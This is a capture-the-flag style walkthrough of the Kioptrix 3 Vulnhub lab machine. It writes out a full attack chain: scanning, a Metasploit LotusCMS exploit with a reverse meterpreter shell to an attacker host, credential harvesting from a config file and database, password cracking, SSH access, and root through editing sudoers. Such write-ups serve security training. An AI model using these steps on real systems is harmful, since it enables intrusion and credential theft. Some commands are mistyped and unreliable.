Walkthrough of Kioptrix 3 Machine -Vulnhub
Hi,
As I wrote my last article on “Pentesting with Metasploit” course, I am starting writing artifact on regular basis on attacking machines available for learning purpose. This write-up is about how to get root access on Kioptix 3 machine available on Vulnhub. Let’s get started,
Reconnaissance:
To find machine on local network use command:
netdiscover -i eth0
Our target machine is 192.168.1.25 as shown in figure 1.1, let’s move forward.
Scanning:
For scanning we will use nmap.
nmap -A 192.168.1.25
Let’s see result we get from scan.
There are 2 ports running on the machine:
- 22
- 80
On port 22 SSH in running and on port 80 http server is running. As we know http is web server so let’s go to web browser firefox and try to access this IP and check what’s there.
Ligoat Security seems like something fishy lets explore it and move to blog section.
Nothing on this page also. Let’s check Login page:
And here we got one clue. This web server is powered by LotusCMS. Let’s search exploit for it.
Exploitation:
Let’s check either there is any exploit available publicly for this specific technology or not. For this we will be using searchsploit:
searchsploit lotuscms
Here we go we found one exploit publicly available for LotusCMS. It is available in metasploit. Let’s try it and see either we get successful in it.
To use Metasploit type command:
msfconsole
After loading metsasploit search for LotusCMS in metasploit using search command:
search lotuscms
To use this exploit we will take help of use command:
use exploit/multi/http/lcms_php_exec
As its apache web server that mean it is using php so we set php payload
set payload php/meterpreter/reverse_tcp
Now set target and attacket host for the exploit to run. RHOSTS is Victim’s ip and LHOST is Attacker’s IP.
set RHOSTS 192.168.1.25
set LHOST 192.168.1.24
One thing more set uri to / by command:
set URI /
then to check either we have all necessary information to exploit and payload before we send them to attack.
show options
Seems everything is perfect now execute the exploit using exploit command:
exploit
Our exploit has successfully exploited the server and we got reverse shell of meterpreter. Let’s see explore current directory using command:
ls
Lets access shell and import python shell. Type shell command on meterpreter to access the exploited machine’s shell.
meterpreter > shell
import -c “import pty; pty.spawn(‘/bin/bash’);”
Privilege Escalation:
As we have successfully exploited the machine now we will try to get root user access in exploited machine. Let’s see explore current directory with command:
ls -al
Let’s explore the gallery directory first and check its content
cd gallery
ls -al
There are too many files. Let’s start checking with gconfig.php. To see content of this file we will use cat command:
cat gconfig.php
Here we go we have just found password for database now again we go back to browser and navigate to phpmyadmin using http://192.168.1.25/phpmyadmin .
Now we try to login the database with credentials we find in figure 1.15:
As we have successfully accessed the database now let’s navigate to gallery as shown above in figure 1.18.
Navigate to dev_accounts as shown in figure 1.19
Here we go we have just found credentails. First we crack those credentials using CrackStation .
Password for dreg is Mast3r.
Password for loneferret is starwars
Now let’s try these passwords on ssh server running on target machine. First we try for dreg account.
ssh dreg@192.168.1.25
It worked it seems that ssh credentails are stored in database. now let’s navigate to other directories.
cd ..
From above figure 1.24 we can realize that this dreg user is limited access to machine, now try to access machine with lonferret user.
ssh loneferret@192.168.1.25
Exploring contents of current directory:
ls -al
Let’s check what is in the CompanyPolicy.README file.
cat CompanyPolicy.README
Here we got a hint to run “sudo ht” command on terminal. Let’s try it.
sudo ht
Here error occur. In order to fix this error we will run command export TERM=xterm. Then run again sudo ht.
export TERM=xterm
sudo ht
This screen will open in effect of sudo ht command. Press “Ctrl + F” to open
navigation window.
Go to open and there type the path of sudoers file which is /etc/sudoers and press enter.
After opening of sudoers file go to loneferret user line and add there “/bin/sh” for privilege escalation.
After adding that specific text save the file and then exit from it back to terminal. On terminal type “sudo bin/sh” command and then user with whoami.
sudo /bin/sh
whoami
Woohoo! we got the root user now use ls command to get the current directory contents and also check the path of current directory using pwd command.
ls
pwd
Now we can navigate to root directory without any restrictions.
cd /root
ls
We have found “Congrats.txt” file. Let’s read its content using cat command:
cat Congrats.txt
Here we go we have just completed the walkthorugh of machine Kioptrix 3 successfully. Hope so you Enjoy it. Thanks for staying till the end! :-)
